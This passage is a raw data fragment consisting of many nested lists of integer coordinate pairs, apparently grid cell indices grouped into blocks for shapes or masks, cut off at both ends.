4 , 32],[ 4 , 33],[ 5 , 18],[ 5 , 19],[ 5 , 20],[ 5 , 21],[ 5 , 28],[ 5 , 29],[ 5 , 30],[ 5 , 31],[ 5 , 32],[ 5 , 33],[ 6 , 18],[ 6 , 22],[ 6 , 23],[ 6 , 24],[ 6 , 28],[ 6 , 29],[ 6 , 30],[ 6 , 34],[ 6 , 35],[ 6 , 36],[ 7 , 18],[ 7 , 22],[ 7 , 23],[ 7 , 24],[ 7 , 28],[ 7 , 29],[ 7 , 30],[ 7 , 34],[ 7 , 35],[ 7 , 36],[ 8 , 18],[ 8 , 22],[ 8 , 23],[ 8 , 24],[ 8 , 28],[ 8 , 29],[ 8 , 30],[ 8 , 34],[ 8 , 35],[ 8 , 36],[ 9 , 19],[ 9 , 22],[ 9 , 25],[ 9 , 26],[ 9 , 28],[ 9 , 31],[ 9 , 32],[ 9 , 34],[ 9 , 35],[ 9 , 37],[ 10 , 19],[ 10 , 22],[ 10 , 25],[ 10 , 26],[ 10 , 28],[ 10 , 31],[ 10 , 32],[ 10 , 34],[ 10 , 35],[ 10 , 37],[ 11 , 19],[ 11 , 22],[ 11 , 25],[ 11 , 26],[ 11 , 28],[ 11 , 31],[ 11 , 32],[ 11 , 34],[ 11 , 35],[ 11 , 37],[ 12 , 19],[ 12 , 22],[ 12 , 25],[ 12 , 26],[ 12 , 28],[ 12 , 31],[ 12 , 32],[ 12 , 34],[ 12 , 35],[ 12 , 37],[ 13 , 20],[ 13 , 23],[ 13 , 25],[ 13 , 27],[ 13 , 29],[ 13 , 31],[ 13 , 33],[ 13 , 34],[ 13 , 36],[ 13 , 37],[ 14 , 20],[ 14 , 23],[ 14 , 25],[ 14 , 27],[ 14 , 29],[ 14 , 31],[ 14 , 33],[ 14 , 34],[ 14 , 36],[ 14 , 37],[ 15 , 21],[ 15 , 24],[ 15 , 26],[ 15 , 27],[ 15 , 30],[ 15 , 32],[ 15 , 33],[ 15 , 35],[ 15 , 36],[ 15 , 37],[ 16 , 21],[ 16 , 24],[ 16 , 26],[ 16 , 27],[ 16 , 30],[ 16 , 32],[ 16 , 33],[ 16 , 35],[ 16 , 36],[ 16 , 37],[ 17 , 21],[ 17 , 24],[ 17 , 26],[ 17 , 27],[ 17 , 30],[ 17 , 32],[ 17 , 33],[ 17 , 35],[ 17 , 36],[ 17 , 37]],[ [1 , 22],[ 1 , 23],[ 1 , 24],[ 1 , 25],[ 1 , 26],[ 1 , 27],[ 1 , 28],[ 1 , 29],[ 1 , 30],[ 1 , 31],[ 2 , 22],[ 2 , 23],[ 2 , 24],[ 2 , 25],[ 2 , 26],[ 2 , 27],[ 2 , 28],[ 2 , 29],[ 2 , 30],[ 2 , 31],[ 3 , 22],[ 3 , 23],[ 3 , 24],[ 3 , 25],[ 3 , 26],[ 3 , 27],[ 3 , 28],[ 3 , 29],[ 3 , 30],[ 3 , 31],[ 4 , 22],[ 4 , 23],[ 4 , 24],[ 4 , 25],[ 4 , 26],[ 4 , 27],[ 4 , 28],[ 4 , 29],[ 4 , 30],[ 4 , 31],[ 5 , 22],[ 5 , 23],[ 5 , 24],[ 5 , 25],[ 5 , 32],[ 5 , 33],[ 5 , 34],[ 5 , 35],[ 5 , 36],[ 5 , 37],[ 6 , 22],[ 6 , 23],[ 6 , 24],[ 6 , 25],[ 6 , 32],[ 6 , 33],[ 6 , 34],[ 6 , 35],[ 6 , 36],[ 6 , 37],[ 7 , 22],[ 7 , 23],[ 7 , 24],[ 7 , 25],[ 7 , 32],[ 7 , 33],[ 7 , 34],[ 7 , 35],[ 7 , 36],[ 7 , 37],[ 8 , 22],[ 8 , 23],[ 8 , 24],[ 8 , 25],[ 8 , 32],[ 8 , 33],[ 8 , 34],[ 8 , 35],[ 8 , 36],[ 8 , 37],[ 9 , 22],[ 9 , 26],[ 9 , 27],[ 9 , 28],[ 9 , 32],[ 9 , 33],[ 9 , 34],[ 9 , 38],[ 9 , 39],[ 9 , 40],[ 10 , 22],[ 10 , 26],[ 10 , 27],[ 10 , 28],[ 10 , 32],[ 10 , 33],[ 10 , 34],[ 10 , 38],[ 10 , 39],[ 10 , 40],[ 11 , 22],[ 11 , 26],[ 11 , 27],[ 11 , 28],[ 11 , 32],[ 11 , 33],[ 11 , 34],[ 11 , 38],[ 11 , 39],[ 11 , 40],[ 12 , 23],[ 12 , 26],[ 12 , 29],[ 12 , 30],[ 12 , 32],[ 12 , 35],[ 12 , 36],[ 12 , 38],[ 12 , 39],[ 12 , 41],[ 13 , 23],[ 13 , 26],[ 13 , 29],[ 13 , 30],[ 13 , 32],[ 13 , 35],[ 13 , 36],[ 13 , 38],[ 13 , 39],[ 13 , 41],[ 14 , 23],[ 14 , 26],[ 14 , 29],[ 14 , 30],[ 14 , 32],[ 14 , 35],[ 14 , 36],[ 14 , 38],[ 14 , 39],[ 14 , 41],[ 15 , 24],[ 15 , 27],[ 15 , 29],[ 15 , 31],[ 15 , 33],[ 15 , 35],[ 15 , 37],[ 15 , 38],[ 15 , 40],[ 15 , 41],[ 16 , 24],[ 16 , 27],[ 16 , 29],[ 16 , 31],[ 16 , 33],[ 16 , 35],[ 16 , 37],[ 16 , 38],[ 16 , 40],[ 16 , 41],[ 17 , 24],[ 17 , 27],[ 17 , 29],[ 17 , 31],[ 17 , 33],[ 17 , 35],[ 17 , 37],[ 17 , 38],[ 17 , 40],[ 17 , 41],[ 18 , 25],[ 18 , 28],[ 18 , 30],[ 18 , 31],[ 18 , 34],[ 18 , 36],[ 18 , 37],[ 18 , 39],[ 18 , 40],[ 18 , 41],[ 19 , 25],[ 19 , 28],[ 19 , 30],[ 19 , 31],[ 19 , 34],[ 19 , 36],[ 19 , 37],[ 19 , 39],[ 19 , 40],[ 19 , 41],[ 20 , 25],[ 20 , 28],[ 20 , 30],[ 20 , 31],[ 20 , 34],[ 20 , 36],[ 20 , 37],[ 20 , 39],[ 20 , 40],[ 20 , 41],[ 21 , 25],[ 21 , 28],[ 21 , 30],[ 21 , 31],[ 21 , 34],[ 21 , 36],[ 21 , 37],[ 21 , 39],[ 21 , 40],[ 21 , 41]],[ [1 , 20],[ 1 , 21],[ 1 , 22],[ 1 , 23],[ 1 , 24],[ 1 , 25],[ 1 , 26],[ 1 , 27],[ 1 , 28],[ 1 , 29],[ 2 , 20],[ 2 , 21],[ 2 , 22],[ 2 , 23],[ 2 , 24],[ 2 , 25],[ 2 , 26],[ 2 , 27],[ 2 , 28],[ 2 , 29],[ 3 , 20],[ 3 , 21],[ 3 , 22],[ 3 , 23],[ 3 , 24],[ 3 , 25],[ 3 , 26],[ 3 , 27],[ 3 , 28],[ 3 , 29],[ 4 , 20],[ 4 , 21],[ 4 , 22],[ 4 , 23],[ 4 , 30],[ 4 , 31],[ 4 , 32],[ 4 , 33],[ 4 , 34],[ 4 , 35],[ 5 , 20],[ 5 , 21],[ 5 , 22],[ 5 , 23],[ 5 , 30],[ 5 , 31],[ 5 , 32],[ 5 , 33],[ 5 , 34],[ 5 , 35],[ 6 , 20],[ 6 , 24],[ 6 , 25],[ 6 , 26],[ 6 , 30],[ 6 , 31],[ 6 , 32],[ 6 , 36],[ 6 , 37],[ 6 , 38],[ 7 , 20],[ 7 , 24],[ 7 , 25],[ 7 , 26],[ 7 , 30],[ 7 , 31],[ 7 , 32],[ 7 , 36],[ 7 , 37],[ 7 , 38],[ 8 , 20],[ 8 , 24],[ 8 , 25],[ 8 , 26],[ 8 , 30],[ 8 , 31],[ 8 , 32],[ 8 , 36],[ 8 , 37],[ 8 , 38],[ 9 , 20],[ 9 , 24],[ 9 , 25],[ 9 , 26],[ 9 , 30],[ 9 , 31],[ 9 , 32],[ 9 , 36],[ 9 , 37],[ 9 , 38],[ 10 , 21],[ 10 , 24],[ 10 , 27],[ 10 , 28],[ 10 , 30],[ 10 , 33],[ 10 , 34],[ 10 , 36],[ 10 , 37],[ 10 , 39],[ 11 , 21],[ 11 , 24],[ 11 , 27],[ 11 , 28],[ 11 , 30],[ 11 , 33],[ 11 , 34],[ 11 , 36],[ 11 , 37],[ 11 , 39],[ 12 , 21],[ 12 , 24],[ 12 , 27],[ 12 , 28],[ 12 , 30],[ 12 , 33],[ 12 , 34],[ 12 , 36],[ 12 , 37],[ 12 , 39],[ 13 , 21],[ 13 , 24],[ 13 , 27],[ 13 , 28],[ 13 , 30],[ 13 , 33],[ 13 , 34],[ 13 , 36],[ 13 , 37],[ 13 , 39],[ 14 , 22],[ 14 , 25],[ 14 , 27],[ 14 , 29],[ 14 , 31],[ 14 , 33],[ 14 , 35],[ 14 , 36],[ 14 , 38],[ 14 , 39],[ 15 , 22],[ 15 , 25],[ 15 , 27],[ 15 , 29],[ 15 , 31],[ 15 , 33],[ 15 , 35],[ 15 , 36],[ 15 , 38],[ 15 , 39],[ 16 , 22],[ 16 , 25],[ 16 , 27],[ 16 , 29],[ 16 , 31],[ 16 , 33],[ 16 , 35],[ 16 , 36],[ 16 , 38],[ 16 , 39],[ 17 , 23],[ 17 , 26],[ 17 , 28],[ 17 , 29],[ 17 , 32],[ 17 , 34],[ 17 , 35],[ 17 , 37],[ 17 , 38],[ 17 , 39],[ 18 , 23],[ 18 , 26],[ 18 , 28],[ 18 , 29],[ 18 , 32],[ 18 , 34],[ 18 , 35],[ 18 , 37],[ 18 , 38],[ 18 , 39],[ 19 , 23],[ 19 , 26],[ 19 , 28],[ 19 , 29],[ 19 , 32],[ 19 , 34],[ 19 , 35],[ 19 , 37],[ 19 , 38],[ 19 , 39]],[ [1 , 18],[ 1 , 19],[ 1 , 20],[ 1 , 21],[ 1 , 22],[ 1 , 23],[ 1 , 24],[ 1 , 25],[ 1 , 26],[ 1 , 27],[ 2 , 18],[ 2 , 19],[ 2 , 20],[ 2 , 21],[ 2 , 22],[ 2 , 23],[ 2 , 24],[ 2 , 25],[ 2 , 26],[ 2 , 27],[ 3 , 18],[ 3 , 19],[ 3 , 20],[ 3 , 21],[ 3 , 22],[ 3 , 23],[ 3 , 24],[ 3 , 25],[ 3 , 26],[ 3 , 27],[ 4 , 18],[ 4 , 19],[ 4 , 20],[ 4 , 21],[ 4 , 28],[ 4 , 29],[ 4 , 30],[ 4 , 31],[ 4 , 32],[ 4 , 33],[ 5 , 18],[ 5 , 19],[ 5 , 20],[ 5 , 21],[ 5 , 28],[ 5 , 29],[ 5 , 30],[ 5 , 31],[ 5 , 32],[ 5 , 33],[ 6 , 18],[ 6 , 19],[ 6 , 20],[ 6 , 21],[ 6 , 28],[ 6 , 29],[ 6 , 30],[ 6 , 31],[ 6 , 32],[ 6 , 33],[ 7 , 18],[ 7 , 22],[ 7 , 23],[ 7 , 24],[ 7 , 28],[ 7 , 29],[ 7 , 30],[ 7 , 34],[ 7 , 35],[ 7 , 36],[ 8 , 18],[ 8 , 22],[ 8 , 23],[ 8 , 24],[ 8 , 28],[ 8 , 29],[ 8 , 30],[ 8 , 34],[ 8 , 35],[ 8 , 36],[ 9 , 18],[ 9 , 22],[ 9 , 23],[ 9 , 24],[ 9 , 28],[ 9 , 29],[ 9 , 30],[ 9 , 34],[ 9 , 35],[ 9 , 36],[ 10 , 19],[ 10 , 22],[ 10 , 25],[ 10 , 26],[ 10 , 28],[ 10 , 31],[ 10 , 32],[ 10 , 34],[ 10 , 35],[ 10 , 37],[ 11 , 19],[ 11 , 22],[ 11 , 25],[ 11 , 26],[ 11 , 28],[ 11 , 31],[ 11 , 32],[ 11 , 34],[ 11 , 35],[ 11 , 37],[ 12 , 19],[ 12 , 22],[ 12 , 25],[ 12 , 26],[ 12 , 28],[ 12 , 31],[ 12 , 32],[ 12 , 34],[ 12 , 35],[ 12 , 37],[ 13 , 20],[ 13 , 23],[ 13 , 25],[ 13 , 27],[ 13 , 29],[ 13 , 31],[ 13 , 33],[ 13 , 34],[ 13 , 36],[ 13 , 37],[ 14 , 20],[ 14 , 23],[ 14 , 25],[ 14 , 27],[ 14 , 29],[ 14 , 31],[ 14 , 33],[ 14 , 34],[ 14 , 36],[ 14 , 37],[ 15 , 21],[ 15 , 24],[ 15 , 26],[ 15 , 27],[ 15 , 30],[ 15 , 32],[ 15 , 33],[ 15 , 35],[ 15 , 36],[ 15 , 37],[ 16 , 21],[ 16 , 24],[ 16 , 26],[ 16 , 27],[ 16 , 30],[ 16 , 32],[ 16 , 33],[ 16 , 35],[ 16 , 36],[ 16 , 37],[ 17 , 21],[ 17 , 24],[ 17 , 26],[ 17 , 27],[ 17 , 30],[ 17 , 32],[ 17 , 33],[ 17 , 35],[ 17 , 36],[ 17 , 37]],[ [1 , 16],[ 1 , 17],[ 1 , 18],[ 1 , 19],[ 1 , 20],[ 1 , 21],[ 1 , 22],[ 1 , 23],[ 1 , 24],[ 1 , 25],[ 2 , 16],[ 2 , 17],[ 2 , 18],[ 2 , 19],[ 2 , 20],[ 2 , 21],[ 2 , 22],[ 2 , 23],[ 2 , 24],[ 2 , 25],[ 3 , 16],[ 3 , 17],[ 3 , 18],[ 3 , 19],[ 3 , 26],[ 3 , 27],[ 3 , 28],[ 3 , 29],[ 3 , 30],[ 3 , 31],[ 4 , 16],[ 4 , 17],[ 4 , 18],[ 4 , 19],[ 4 , 26],[ 4 , 27],[ 4 , 28],[ 4 , 29],[ 4 , 30],[ 4 , 31],[ 5 , 16],[ 5 , 17],[ 5 , 18],[ 5 , 19],[ 5 , 26],[ 5 , 27],[ 5 , 28],[ 5 , 29],[ 5 , 30],[ 5 , 31],[ 6 , 16],[ 6 , 20],[ 6 , 21],[ 6 , 22],[ 6 , 26],[ 6 , 27],[ 6 , 28],[ 6 , 32],[ 6 , 33],[ 6 , 34],[ 7 , 16],[ 7 , 20],[ 7 , 21],[ 7 , 22],[ 7 , 26],[ 7 , 27],[ 7 , 28],[ 7 , 32],[ 7 , 33],[ 7 , 34],[ 8 , 16],[ 8 , 20],[ 8 , 21],[ 8 , 22],[ 8 , 26],[ 8 , 27],[ 8 , 28],[ 8 , 32],[ 8 , 33],[ 8 , 34],[ 9 , 16],[ 9 , 20],[ 9 , 21],[ 9 , 22],[ 9 , 26],[ 9 , 27],[ 9 , 28],[ 9 , 32],[ 9 , 33],[ 9 , 34],[ 10 , 17],[ 10 , 20],[ 10 , 23],[ 10 , 24],[ 10 , 26],[ 10 , 29],[ 10 , 30],[ 10 , 32],[ 10 , 33],[ 10 , 35],[ 11 , 17],[ 11 , 20],[ 11 , 23],[ 11 , 24],[ 11 , 26],[ 11 , 29],[ 11 , 30],[ 11 , 32],[ 11 , 33],[ 11 , 35],[ 12 , 18],[ 12 , 21],[ 12 , 23],[ 12 , 25],[ 12 , 27],[ 12 , 29],[ 12 , 31],[ 12 , 32],[ 12 , 34],[ 12 , 35],[ 13 , 19],[ 13 , 22],[ 13 , 24],[ 13 , 25],[ 13 , 28],[ 13 , 30],[ 13 , 31],[ 13 , 33],[ 13 , 34],[ 13 , 35],[ 14 , 19],[ 14 , 22],[ 14 , 24],[ 14 , 25],[ 14 , 28],[ 14 , 30],[ 14 , 31],[ 14 , 33],[ 14 , 34],[ 14 , 35],[ 15 , 19],[ 15 , 22],[ 15 , 24],[ 15 , 25],[ 15 , 28],[ 15 , 30],[ 15 , 31],[ 15 , 33],[ 15 , 34],[ 15 , 35]],[ [1 , 16],[ 1 , 17],[ 1 , 18],[ 1 , 19],[ 1 , 20],[ 1 , 21],[ 1 , 22],[ 1 , 23],[ 1 , 24],[ 1 , 25],[ 2 , 16],[ 2 , 17],[ 2 , 18],[ 2 , 19],[ 2 , 20],[ 2 , 21],[ 2 , 22],[ 2 , 23],[ 2 , 24],[ 2 , 25],[ 3 , 16],[ 3 , 17],[ 3 , 18],[ 3 , 19],[ 3 , 26],[ 3 , 27],[ 3 , 28],[ 3 , 29],[ 3 , 30],[ 3 , 31],[ 4 , 16],[ 4 , 17],[ 4 , 18],[ 4 , 19],[ 4 , 26],[ 4 , 27],[ 4 , 28],[ 4 , 29],[ 4 , 30],[ 4 , 31],[ 5 , 16],[ 5 , 17],[ 5 , 18],[ 5 , 19],[ 5 , 26],[ 5 , 27],[ 5 , 28],[ 5 , 29],[ 5 , 30],[ 5 , 31],[ 6 , 16],[ 6 , 20],[ 6 , 21],[ 6 , 22],[ 6 , 26],[ 6 , 27],[ 6 , 28],[ 6 , 32],[ 6 , 33],[ 6 , 34],[ 7 , 16],[ 7 , 20],[ 7 , 21],[ 7 , 22],[ 7 , 26],[ 7 , 27],[ 7 , 28],[ 7 , 32],[ 7 , 33],[ 7 , 34],[ 8 , 17],[ 8 , 20],[ 8 , 23],[ 8 , 24],[ 8 , 26],[ 8 , 29],[ 8 , 30],[ 8 , 32],[ 8 , 33],[ 8 , 35],[ 9 , 17],[ 9 , 20],[ 9 , 23],[ 9 , 24],[ 9 , 26],[ 9 , 29],[ 9 , 30],[ 9 , 32],[ 9 , 33],[ 9 , 35],[ 10 , 17],[ 10 , 20],[ 10 , 23],[ 10 , 24],[ 10 , 26],[ 10 , 29],[ 10 , 30],[ 10 , 32],[ 10 , 33],[ 10 , 35],[ 11 , 18],[ 11 , 21],[ 11 , 23],[ 11 , 25],[ 11 , 27],[ 11 , 29],[ 11 , 31],[ 11 , 32],[ 11 , 34],[ 11 , 35],[ 12 , 18],[ 12 , 21],[ 12 , 23],[ 12 , 25],[ 12 , 27],[ 12 , 29],[ 12 , 31],[ 12 , 32],[ 12 , 34],[ 12 , 35],[ 13 , 19],[ 13 , 22],[ 13 , 24],[ 13 , 25],[ 13 , 28],[ 13 , 30],[ 13 , 31],[ 13 , 33],[ 13 , 34],[ 13 , 35],[ 14 , 19],[ 14 , 22],[ 14 , 24],[ 14 , 25],[ 14 , 28],[ 14 , 30],[ 14 , 31],[ 14 , 33],[ 14 , 34],[ 14 , 35],[ 15 , 19],[ 15 , 22],[ 15 , 24],[ 15 , 25],[ 15 , 28],[ 15 , 30],[ 15 , 31],[ 15 , 33],[ 15 , 34],[ 15 , 35]],[ [1 , 20],[ 1 , 21],[ 1 , 22],[ 1 , 23],[ 1 , 24],[ 1 , 25],[ 1 , 26],[ 1 , 27],[ 1 , 28],[ 1 , 29],[ 2 , 20],[ 2 , 21],[ 2 , 22],[ 2 , 23],[ 2 , 24],[ 2 , 25],[ 2 , 26],[ 2 , 27],[ 2 , 28],[ 2 , 29],[ 3 , 20],[ 3 , 21],[ 3 , 22],[ 3 , 23],[ 3 , 30],[ 3 , 31],[ 3 , 32],[ 3 , 33],[ 3 , 34],[ 3 , 35],[ 4 , 20],[ 4 , 21],[ 4 , 22],[ 4 , 23],[ 4 , 30],[ 4 , 31],[ 4 , 32],[ 4 , 33],[ 4 , 34],[ 4 , 35],[ 5 , 20],[ 5 , 21],[ 5 , 22],[ 5 , 23],[ 5 , 30],[ 5 , 31],[ 5 , 32],[ 5 , 33],[ 5 , 34],[ 5 , 35],[ 6 , 20],[ 6 , 21],[ 6 , 22],[ 6 , 23],[ 6 , 30],[ 6 , 31],[ 6 , 32],[ 6 , 33],[ 6 , 34],[ 6 , 35],[ 7 , 20],[ 7 , 24],[ 7 , 25],[ 7 , 26],[ 7 , 30],[ 7 , 31],[ 7 , 32],[ 7 , 36],[ 7 , 37],[ 7 , 38],[ 8 , 20],[ 8 , 24],[ 8 , 25],[ 8 , 26],[ 8 , 30],[ 8 , 31],[ 8 , 32],[ 8 , 36],[ 8 , 37],[ 8 , 38],[ 9 , 20],[ 9 , 24],[ 9 , 25],[ 9 , 26],[ 9 , 30],[ 9 , 31],[ 9 , 32],[ 9 , 36],[ 9 , 37],[ 9 , 38],[ 10 , 20],[ 10 , 24],[ 10 , 25],[ 10 , 26],[ 10 , 30],[ 10 , 31],[ 10 , 32],[ 10 , 36],[ 10 , 37],[ 10 , 38],[ 11 , 21],[ 11 , 24],[ 11 , 27],[ 11 , 28],[ 11 , 30],[ 11 , 33],[ 11 , 34],[ 11 , 36],[ 11 , 37],[ 11 , 39],[ 12 , 21],[ 12 , 24],[ 12 , 27],[ 12 , 28],[ 12 , 30],[ 12 , 33],[ 12 , 34],[ 12 , 36],[ 12 , 37],[ 12 , 39],[ 13 , 21],[ 13 , 24],[ 13 , 27],[ 13 , 28],[ 13 , 30],[ 13 , 33],[ 13 , 34],[ 13 , 36],[ 13 , 37],[ 13 , 39],[ 14 , 22],[ 14 , 25],[ 14 , 27],[ 14 , 29],[ 14 , 31],[ 14 , 33],[ 14 , 35],[ 14 , 36],[ 14 , 38],[ 14 , 39],[ 15 , 22],[ 15 , 25],[ 15 , 27],[ 15 , 29],[ 15 , 31],[ 15 , 33],[ 15 , 35],[ 15 , 36],[ 15 , 38],[ 15 , 39],[ 16 , 22],[ 16 , 25],[ 16 , 27],[ 16 , 29],[ 16 , 31],[ 16 , 33],[ 16 , 35],[ 16 , 36],[ 16 , 38],[ 16 , 39],[ 17 , 23],[ 17 , 26],[ 17 , 28],[ 17 , 29],[ 17 , 32],[ 17 , 34],[ 17 , 35],[ 17 , 37],[ 17 , 38],[ 17 , 39],[ 18 , 23],[ 18 , 26],[ 18 , 28],[ 18 , 29],[ 18 , 32],[ 18 , 34],[ 18 , 35],[ 18 , 37],[ 18 , 38],[ 18 , 39],[ 19 , 23],[ 19 , 26],[ 19 , 28],[ 19 , 29],[ 19 , 32],[ 19 , 34],[ 19 , 35],[ 19 , 37],[ 19 , 38],[ 19 , 39]],[ [1 , 20],[ 1 , 21],[ 1 , 22],[ 1 , 23],[ 1 , 24],[ 1 , 25],[ 1 , 26],[ 1 , 27],[ 1 , 28],[ 1 , 29],[ 2 , 20],[ 2 , 21],[ 2 , 22],[ 2 , 23],[ 2 , 24],[ 2 , 25],[ 2 , 26],[ 2 , 27],[ 2 , 28],[ 2 , 29],[ 3 , 20],[ 3 , 21],[ 3 , 22],[ 3 , 23],[ 3 , 24],[ 3 , 25],[ 3 , 26],[ 3 , 27],[ 3 , 28],[ 3 , 29],[ 4 , 20],[ 4 , 21],[ 4 , 22],[ 4 , 23],[ 4 , 24],[ 4 , 25],[ 4 , 26],[ 4 , 27],[ 4 , 28],[ 4 , 29],[ 5 , 20],[ 5 , 21],[ 5 , 22],[ 5 , 23],[ 5 , 30],[ 5 , 31],[ 5 , 32],[ 5 , 33],[ 5 , 34],[ 5 , 35],[ 6 , 20],[ 6 , 21],[ 6 , 22],[ 6 , 23],[ 6 , 30],[ 6 , 31],[ 6 , 32],[ 6 , 33],[ 6 , 34],[ 6 , 35],[ 7 , 20],[ 7 , 21],[ 7 , 22],[ 7 , 23],[ 7 , 30],[ 7 , 31],[ 7 , 32],[ 7 , 33],[ 7 , 34],[ 7 , 35],[ 8 , 20],[ 8 , 24],[ 8 , 25],[ 8 , 26],[ 8 , 30],[ 8 , 31],[ 8 , 32],[ 8 , 36],[ 8 , 37],[ 8 , 38],[ 9 , 20],[ 9 , 24],[ 9 , 25],[ 9 , 26],[ 9 , 30],[ 9 , 31],[ 9 , 32],[ 9 , 36],[ 9 , 37],[ 9 , 38],[ 10 , 20],[ 10 , 24],[ 10 , 25],[ 10 , 26],[ 10 , 30],[ 10 , 31],[ 10 , 32],[ 10 , 36],[ 10 , 37],[ 10 , 38],[ 11 , 21],[ 11 , 24],[ 11 , 27],[ 11 , 28],[ 11 , 30],[ 11 , 33],[ 11 , 34],[ 11 , 36],[ 11 , 37],[ 11 , 39],[ 12 , 21],[ 12 , 24],[ 12 , 27],[ 12 , 28],[ 12 , 30],[ 12 , 33],[ 12 , 34],[ 12 , 36],[ 12 , 37],[ 12 , 39],[ 13 , 22],[ 13 , 25],[ 13 , 27],[ 13 , 29],[ 13 , 31],[ 13 , 33],[ 13 , 35],[ 13 , 36],[ 13 , 38],[ 13 , 39],[ 14 , 22],[ 14 , 25],[ 14 , 27],[ 14 , 29],[ 14 , 31],[ 14 , 33],[ 14 , 35],[ 14 , 36],[ 14 , 38],[ 14 , 39],[ 15 , 22],[ 15 , 25],[ 15 , 27],[ 15 , 29],[ 15 , 31],[ 15 , 33],[ 15 , 35],[ 15 , 36],[ 15 , 38],[ 15 , 39],[ 16 , 22],[ 16 , 25],[ 16 , 27],[ 16 , 29],[ 16 , 31],[ 16 , 33],[ 16 , 35],[ 16 , 36],[ 16 , 38],[ 16 , 39],[ 17 , 23],[ 17 , 26],[ 17 , 28],[ 17 , 29],[ 17 , 32],[ 17 , 34],[ 17 , 35],[ 17 , 37],[ 17 , 38],[ 17 , 39],[ 18 , 23],[ 18 , 26],[ 18 , 28],[ 18 , 29],[ 18 , 32],[ 18 , 34],[ 18 , 35],[ 18 , 37],[ 18 , 38],[ 18 , 39],[ 19 , 23],[ 19 , 26],[ 19 , 28],[ 19 , 29],[ 19 , 32],[ 19 , 34],[ 19 , 35],[ 19 , 37],[ 19 , 38],[ 19 , 39]],[ [1 , 18],[ 1 , 19],[ 1 , 20],[ 1 , 21],[ 1 , 22],[ 1 , 23],[ 1 , 24],[ 1 , 25],[ 1 , 26],[ 1 , 27],[ 2 , 18],[ 2 , 19],[ 2 , 20],[ 2 , 21],[ 2 , 28],[ 2 , 29],[ 2 , 30],[ 2 , 31],[ 2 , 32],[ 2 , 33],[ 3 , 18],[ 3 , 19],[ 3 , 20],[ 3 , 21],[ 3 , 28],[ 3 , 29],[ 3 , 30],[ 3 , 31],[ 3 , 32],[ 3 , 33],[ 4 , 18],[ 4 , 19],[ 4 , 20],[ 4 , 21],[ 4 , 28],[ 4 , 29],[ 4 , 30],[ 4 , 31],[ 4 , 32],[ 4 , 33],[ 5 , 18],[ 5 , 19],[ 5 , 20],[ 5 , 21],[ 5 , 28],[ 5 , 29],[ 5 , 30],[ 5 , 31],[ 5 , 32],[ 5 , 33],[ 6 , 18],[ 6 , 22],[ 6 , 23],[ 6 , 24],[ 6 , 28],[ 6 , 29],[ 6 , 30],[ 6 , 34],[ 6 , 35],[ 6 , 36],[ 7 , 18],[ 7 , 22],[ 7 , 23],[ 7 , 24],[ 7 , 28],[ 7 , 29],[ 7 , 30],[ 7 , 34],[ 7 , 35],[ 7 , 36],[ 8 , 18],[ 8 , 22],[ 8 , 23],[ 8 , 24],[ 8 , 28],[ 8 , 29],[ 8 , 30],[ 8 , 34],[ 8 , 35],[ 8 , 36],[ 9 , 18],[ 9 , 22],[ 9 , 23],[ 9 , 24],[ 9 , 28],[ 9 , 29],[ 9 , 30],[ 9 , 34],[ 9 , 35],[ 9 , 36],[ 10 , 19],[ 10 , 22],[ 10 , 25],[ 10 , 26],[ 10 , 28],[ 10 , 31],[ 10 , 32],[ 10 , 34],[ 10 , 35],[ 10 , 37],[ 11 , 19],[ 11 , 22],[ 11 , 25],[ 11 , 26],[ 11 , 28],[ 11 , 31],[ 11 , 32],[ 11 , 34],[ 11 , 35],[ 11 , 37],[ 12 , 19],[ 12 , 22],[ 12 , 25],[ 12 , 26],[ 12 , 28],[ 12 , 31],[ 12 , 32],[ 12 , 34],[ 12 , 35],[ 12 , 37],[ 13 , 20],[ 13 , 23],[ 13 , 25],[ 13 , 27],[ 13 , 29],[ 13 , 31],[ 13 , 33],[ 13 , 34],[ 13 , 36],[ 13 , 37],[ 14 , 20],[ 14 , 23],[ 14 , 25],[ 14 , 27],[ 14 , 29],[ 14 , 31],[ 14 , 33],[ 14 , 34],[ 14 , 36],[ 14 , 37],[ 15 , 21],[ 15 , 24],[ 15 , 26],[ 15 , 27],[ 15 , 30],[ 15 , 32],[ 15 , 33],[ 15 , 35],[ 15 , 36],[ 15 , 37],[ 16 , 21],[ 16 , 24],[ 16 , 26],[ 16 , 27],[ 16 , 30],[ 16 , 32],[ 16 , 33],[ 16 , 35],[ 16 , 36],[ 16 , 37],[ 17 , 21],[ 17 , 24],[ 17 , 26],[ 17 , 27],[ 17 , 30],[ 17 , 32],[ 17 , 33],[ 17 , 35],[ 17 , 36],[ 17 , 37]],[ [1 , 18],[ 1 , 19],[ 1 , 20],[ 1 , 21],[ 1 , 22],[ 1 , 23],[ 1 , 24],[ 1 , 25],[ 1 , 26],[ 1 , 27],[ 2 , 18],[ 2 , 19],[ 2 , 20],[ 2 , 21],[ 2 , 22],[ 2 , 23],[ 2 , 24],[ 2 , 25],[ 2 , 26],[ 2 , 27],[ 3 , 18],[ 3 , 19],[ 3 , 20],[ 3 , 21],[ 3 , 22],[ 3 , 23],[ 3 , 24],[ 3 , 25],[ 3 , 26],[ 3 , 27],[ 4 , 18],[ 4 , 19],[ 4 , 20],[ 4 , 21],[ 4 , 28],[ 4 , 29],[ 4 , 30],[ 4 , 31],[ 4 , 32],[ 4 , 33],[ 5 , 18],[ 5 , 19],[ 5 , 20],[ 5 , 21],[ 5 , 28],[ 5 , 29],[ 5 , 30],[ 5 , 31],[ 5 , 32],[ 5 , 33],[ 6 , 18],[ 6 , 19],[ 6 , 20],[ 6 , 21],[ 6 , 28],[ 6 , 29],[ 6 , 30],[ 6 , 31],[ 6 , 32],[ 6 , 33],[ 7 , 18],[ 7 , 22],[ 7 , 23],[ 7 , 24],[ 7 , 28],[ 7 , 29],[ 7 , 30],[ 7 , 34],[ 7 , 35],[ 7 , 36],[ 8 , 18],[ 8 , 22],[ 8 , 23],[ 8 , 24],[ 8 , 28],[ 8 , 29],[ 8 , 30],[ 8 , 34],[ 8 , 35],[ 8 , 36],[ 9 , 18],[ 9 , 22],[ 9 , 23],[ 9 , 24],[ 9 , 28],[ 9 , 29],[ 9 , 30],[ 9 , 34],[ 9 , 35],[ 9 , 36],[ 10 , 19],[ 10 , 22],[ 10 , 25],[ 10 , 26],[ 10 , 28],[ 10 , 31],[ 10 , 32],[ 10 , 34],[ 10 , 35],[ 10 , 37],[ 11 , 19],[ 11 , 22],[ 11 , 25],[ 11 , 26],[ 11 , 28],[ 11 , 31],[ 11 , 32],[ 11 , 34],[ 11 , 35],[ 11 , 37],[ 12 , 19],[ 12 , 22],[ 12 , 25],[ 12 , 